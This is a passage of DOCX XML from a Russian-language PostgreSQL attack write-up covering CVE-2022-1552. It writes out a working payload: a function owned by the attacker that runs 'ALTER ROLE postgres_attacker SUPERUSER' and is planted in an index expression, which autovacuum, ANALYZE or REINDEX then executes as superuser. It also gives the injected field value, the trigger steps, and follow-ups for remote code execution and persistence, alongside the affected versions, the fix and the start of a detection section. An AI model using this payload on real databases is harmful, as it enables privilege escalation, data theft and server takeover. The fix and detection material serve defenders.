      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкатенация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indexed_expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в DDL + application-роль с правом CREATE на схему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (типично для analytics-платформ с per-tenant schemas). Атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">indexed_expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> со ссылкой на свою функцию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — index-expression trap + autovacuum trigger</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(от application-роли с CREATE на схеме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X</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CREATE SCHEMA IF NOT EXISTS atk;</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FUNCTION atk.evil(numeric) RETURNS numeric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ALTER ROLE postgres_attacker SUPERUSER;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN $1;</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postgres_attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — заранее созданная роль атакующего (через SQLi на предыдущем этапе или через legitimate signup). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE ... SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует superuser-привилегии — это и есть финальная цель эскалации.</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(через уязвимый endpoint):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name = "reports_q4"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">indexed_expression = "atk.evil(val)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>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CREATE TABLE tenant_X.reports_q4 (id serial, val numeric);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX ON tenant_X.reports_q4 ((atk.evil(val)));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Index создан. Таблица пустая, ничего не вычисляется немедленно. На этом активные действия атакующего закончены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (trigger — пассивный, ждёт):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Атакующий или сам admin/cron вставляет тестовые данные:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO tenant_X.reports_q4 (val) SELECT generate_series(1, 100);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Или просто ждёт, пока autovacuum-demon придёт обработать таблицу. Когда autovacuum (или admin вручную) выполняет:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- или REINDEX TABLE tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- или CLUSTER tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Index-expression вычисляется для каждой строки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">До фикса</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atk.evil(val)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется в контексте autovacuum (superuser). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE postgres_attacker SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После фикса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (14.3+/13.7+/...) — index-expressions выполняются в SRO-sandbox, который блокирует функции-ловушки, принадлежащие не-owner таблицы.</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При успешной эксплуатации — роль атакующего получает SUPERUSER, доступны все векторы 3.7 (COPY PROGRAM, untrusted languages), полный доступ к данным БД,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lo_export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, persistence через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / event-triggers. Окно эксплуатации — время до следующего ANALYZE/autovacuum (минуты для активных таблиц, часы для редких).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">evil()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> может сразу запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.7.1) для немедленного RCE, или установить trojan-функцию в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для persistence (см. 3.13.4).</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PostgreSQL имеет concept of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">security restricted operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SRO) — режим, в котором определённые SQL-операции (создание таблиц, изменение search_path, GRANT/REVOKE) запрещены. SRO применяется при выполнении кода в контексте, отличном от текущей сессии (например, в SECURITY DEFINER функциях или в admin-командах, работающих с user-owned объектами).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">До CVE-2022-1552 SRO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не применялся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к следующим командам, обрабатывающим index expressions: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ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая авто-ANALYZE от autovacuum)</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REINDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая REINDEX CONCURRENTLY)</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CLUSTER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REFRESH MATERIALIZED VIEW</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pg_amcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (extension для проверки целостности индексов)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда superuser (или autovacuum) запускал эти команды, expressions исполнялись с full superuser-привилегиями, без проверки ownership функций. Это и был bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс — расширение SRO-sandbox на все перечисленные команды. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/commands/analyze.c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src/backend/commands/cluster.c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src/backend/commands/indexcmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. После фикса при попытке вызвать функцию другого owner-а из index expression в этих командах возникает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: function ... is not the owner of the table</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 (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 14.2, 13.6, 12.10, 11.15, 10.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14.3, 13.7, 12.11, 11.16, 10.21 (выпущены 12 мая 2022).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CREATE на любой схеме, к которой обращается autovacuum (типично — schema принадлежит user-роли, в которой создаётся таблица)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CREATE FUNCTION в собственной схеме (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">atk</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Superuser не требуется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жертвы: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autovacuum работает как superuser (default; не настраивается)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либо admin вручную запускает ANALYZE/REINDEX/CLUSTER/REFRESH MATVIEW/pg_amcheck на таблице атакующего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 требуются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">evil()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на plpgsql достаточно для эскалации без RCE; для прямого RCE — plperlu / plpython3u (см. 3.7).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autovacuum = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default). При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">autovacuum = off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака требует явного admin-triggering — менее автоматизированная, но всё ещё возможная.</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CVE-2022-1552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 per PostgreSQL Project)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 мая 2022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 14.2, 13.6, 12.10, 11.15, 10.20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14.3, 13.7, 12.11, 11.16, 10.21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SRO-sandbox bypass в обслуживающих командах с index expressions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Privilege escalation от CREATE-on-schema до superuser</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Function-based indexes — стандартный PostgreSQL-паттерн для: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case-insensitive search: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX ON users (lower(email))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JSONB indexing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX ON events ((data-&gt;&gt;'event_type'))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expression-based partial indexes для performance optimization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materialized view индексирование результатов агрегации</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ddl_command_end</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CREATE INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с фильтром по index expression, ссылающемуся на функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
